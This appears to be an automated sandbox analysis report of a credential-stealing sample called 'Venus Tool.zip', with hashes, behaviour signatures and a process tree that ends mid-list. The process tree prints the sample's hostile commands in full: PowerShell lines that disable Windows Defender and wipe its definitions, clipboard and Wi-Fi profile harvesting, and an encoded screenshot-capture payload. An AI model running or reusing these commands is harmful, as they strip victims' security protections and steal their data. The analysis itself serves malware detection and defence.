Analysis

  • max time kernel
    108s
  • max time network
    275s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-ja
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240508-ja, locale:ja-jp, os:windows10-2004-x64, system:windows
  • submitted
    21-06-2024 11:23

General

  • Target

    Venus Tool.zip

  • Size

    9.5MB

  • MD5

    93002d26791ba6a2a3a0c9b6e56a724f

  • SHA1

    698baf5174c5d6f4c09702f9db6cdd709ed1945b

  • SHA256

    52cf7db1923f0518fca3f6f8838312e5241c5faf5bd9a834a54640e0561a79f0

  • SHA512

    eed38e08f34b1a0566d4d924b15b5bf61e33405d66616e5a1d4f2edef07ecf7c7fe7429fc18be107775f4d6a2eb125839855386d3f195db15c6c475c59dedfab

  • SSDEEP

    196608:qQXyE46kTQXurPdEA1lH2li/YASP8lyc59bl3QDUoCbn9rOceHCJoYQO:jq6kTQX0dEAalJ6LpADPQ9ioJF

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 48 IoCs
  • UPX packed file 64 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 6 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 27 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 17 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 43 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.exe
    C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\Venus Tool.zip"
    1⤵
    PID:560
  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe"
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4900
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffabc42ab58,0x7ffabc42ab68,0x7ffabc42ab78
      2⤵
      PID:3764
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1744 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:2
      2⤵
      PID:3240
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:8
      2⤵
      PID:2892
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2268 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:8
      2⤵
      PID:2104
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3124 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:1
      2⤵
      PID:1988
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3132 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:1
      2⤵
      PID:3256
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4304 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:1
      2⤵
      PID:1108
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4508 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:8
      2⤵
      PID:4020
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4664 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:8
      2⤵
      PID:4704
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4536 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:8
      2⤵
      PID:4676
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4600 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:8
      2⤵
      PID:528
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4956 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:8
      2⤵
      PID:3180
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4876 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:1
      2⤵
      PID:5252
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=1724 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:1
      2⤵
      PID:5736
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4336 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:1
      2⤵
      PID:6132
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=4332 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:1
      2⤵
      PID:5280
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5004 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:1
      2⤵
      PID:1932
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=5076 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:1
      2⤵
      PID:5612
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5212 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:1
      2⤵
      PID:5260
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=5280 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:1
      2⤵
      PID:5268
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5640 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:8
      2⤵
      PID:872
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5788 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:8
      2⤵
      • Modifies registry class
      PID:3616
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=5856 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:1
      2⤵
      PID:6024
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6120 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:8
      2⤵
      PID:6076
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=6212 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:1
      2⤵
      PID:3468
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=6320 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:1
      2⤵
      PID:3620
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=6456 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:1
      2⤵
      PID:3728
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=6612 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:1
      2⤵
      PID:620
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=6836 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:1
      2⤵
      PID:6188
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7096 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:8
      2⤵
      PID:6480
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6136 --field-trial-handle=1936,i,11763541505570406944,4107330720622352792,131072 /prefetch:8
      2⤵
      PID:6584
  • C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
    "C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
    1⤵
    PID:4224
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=ja --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3964,i,12793309452893951174,5058788966923534121,262144 --variations-seed-version --mojo-platform-channel-handle=4036 /prefetch:8
    1⤵
    PID:4244
  • C:\Windows\system32\AUDIODG.EXE
    C:\Windows\system32\AUDIODG.EXE 0x470 0x3c8
    1⤵
    PID:5448
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
    PID:6704
  • C:\Users\Admin\Downloads\Venus Tool\v.exe
    "C:\Users\Admin\Downloads\Venus Tool\v.exe"
    1⤵
    PID:5224
    • C:\Users\Admin\Downloads\Venus Tool\v.exe
      "C:\Users\Admin\Downloads\Venus Tool\v.exe"
      2⤵
      • Loads dropped DLL
      PID:6828
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Venus Tool\v.exe'"
        3⤵
        PID:7040
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Venus Tool\v.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:4816
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        PID:7048
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4808
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        PID:7152
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          PID:4032
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        PID:4436
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          PID:6084
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        PID:1724
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          PID:6300
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        PID:5772
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:3960
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        PID:5812
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          PID:6276
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        PID:5188
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
          PID:5960
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        3⤵
        PID:5368
        • C:\Windows\system32\netsh.exe
          netsh wlan show profile
          4⤵
          • Event Triggered Execution: Netsh Helper DLL
          PID:1432
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "systeminfo"
        3⤵
        PID:1880
        • C:\Windows\system32\systeminfo.exe
          systeminfo
          4⤵
          • Gathers system information
          PID:4540
      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
                                                                                                        3⤵
                                                                                                          PID:668
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUA
BvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                            4⤵
                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            PID:628
                                                                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ugkl0rze\ugkl0rze.cmdline"
                                                                                                              5⤵
                                                                                                                PID:6212
                                                                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFF1C.tmp" "c:\Users\Admin\AppData\Local\Temp\ugkl0rze\CSC1322CA4460A849FCBC298E29DF2B2FFA.TMP"
                                                                                                                  6⤵
                                                                                                                    PID:2440
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                              3⤵
                                                                                                                PID:5440
                                                                                                                • C:\Windows\system32\tree.com
                                                                                                                  tree /A /F
                                                                                                                  4⤵
                                                                                                                    PID:3440
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                  3⤵
                                                                                                                    PID:2736
                                                                                                                    • C:\Windows\system32\tree.com
                                                                                                                      tree /A /F
                                                                                                                      4⤵
                                                                                                                        PID:6216
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                      3⤵
                                                                                                                        PID:6248
                                                                                                                        • C:\Windows\system32\tree.com
                                                                                                                          tree /A /F
                                                                                                                          4⤵
                                                                                                                            PID:5972
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                          3⤵
                                                                                                                            PID:6040
                                                                                                                            • C:\Windows\system32\tree.com
                                                                                                                              tree /A /F
                                                                                                                              4⤵
                                                                                                                                PID:5460
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                              3⤵
                                                                                                                                PID:5580
                                                                                                                                • C:\Windows\system32\tree.com
                                                                                                                                  tree /A /F
                                                                                                                                  4⤵
                                                                                                                                    PID:1712
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3764"
                                                                                                                                  3⤵
                                                                                                                                    PID:6812
                                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                                      taskkill /F /PID 3764
                                                                                                                                      4⤵
                                                                                                                                      • Kills process with taskkill
                                                                                                                                      PID:3728
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 436"
                                                                                                                                    3⤵
                                                                                                                                      PID:2712
                                                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                                                        taskkill /F /PID 436
                                                                                                                                        4⤵
                                                                                                                                        • Kills process with taskkill
